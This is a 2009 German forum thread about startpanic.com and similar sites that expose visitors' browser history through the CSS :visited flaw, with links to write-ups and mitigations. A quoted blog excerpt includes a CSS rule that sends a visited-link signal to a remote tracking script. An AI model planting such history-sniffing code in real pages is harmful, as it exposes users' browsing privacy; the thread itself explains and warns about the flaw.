Startpanic.com zeigt meine Browser History! Sicherheitslücke in Browser?

#0
24.04.2009, 22:16
Member

Beiträge: 39
#1 Leute,

ich habe gerade von einem Bekannten folgende Website zugespielt bekommen:

http://startpanic.com

diese Website schafft es meine Browser History auszulesen ;) ;) ;)
und hat diese auch noch meinem Kumpel geschickt!

Kann mir bitte jemand erklären, was da los ist?
Ich verwende den aktuellsten Firefox Browser!
Wie kann es sein das da so grosse Sicherheitslücken im Browser bestehen?

vielen Dank
Kliniaro
Seitenanfang Seitenende
24.04.2009, 22:19
Member
Avatar Laserpointa

Beiträge: 2176
#2 http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript
http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/

etwas Lesestoff, ich guck aber auch gerade was das ist?
Fiese Lücke!

Schnelle Abhilfe sollte übrigens https://addons.mozilla.org/de/firefox/addon/722 schaffen! tut nicht!

Greetz Lp
Dieser Beitrag wurde am 25.04.2009 um 19:53 Uhr von Laserpointa editiert.
Seitenanfang Seitenende
25.04.2009, 13:51
...neu hier

Beiträge: 1
#3 as I wrote in my blogpost, turning javascript off won't help:

Zitat

But even you manage to make scripts unaware about the state of your links, there will always be a server-side attack vector – for those links that you want to check you can just specify a unique background-image pointing to some server-side tracking script, e.g.:

#alQaedaLnk:visited {background:url(http://www.cia.gov/track.pl); })
Seitenanfang Seitenende
25.04.2009, 19:53
Member
Avatar Laserpointa

Beiträge: 2176
#4 Dear sharovatov,

thank you, for your instant update and interesting blogpost ;)
Mozilla just assigned this bug - yippiie, let's see how quick they may fix it!

Greetz Lp
Dieser Beitrag wurde am 25.04.2009 um 20:18 Uhr von Laserpointa editiert.
Seitenanfang Seitenende
26.04.2009, 14:41
Member
Avatar Laserpointa

Beiträge: 2176
#5 anscheinend ist der Bug schon seit 2000! bekannt!?

Abhilfe, müsste allerdings mal jemand aktualisieren!
http://www.safehistory.com/

Greetz Lp
Seitenanfang Seitenende
27.04.2009, 00:58
Member

Beiträge: 327
#6

Zitat

Here we go! 3 sites detected

startpanic.com

Trojaner-Board - powered by Trojan...

FILExt - The File Extension Source
im Verlauf sind aber wesentlich mehr Seiten gespeichert. Werden bei Euch alle angezeigt? Bei FILExt habe ich heute Vormittag etwas gesucht, alles was dazwischen war, wird nicht angezeigt.

Browser: IE 7, alle Updates.
__________
darknight, die wo anders Heike ist. ;)
Seitenanfang Seitenende
20.05.2009, 10:53
Member
Avatar Jagge

Beiträge: 702
#7 hier gibt es inzwischen noch einen Dienst der diese Lücke ausnutzt:

http://caughthemwatching.com/

nett gemacht.
Jagge
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren: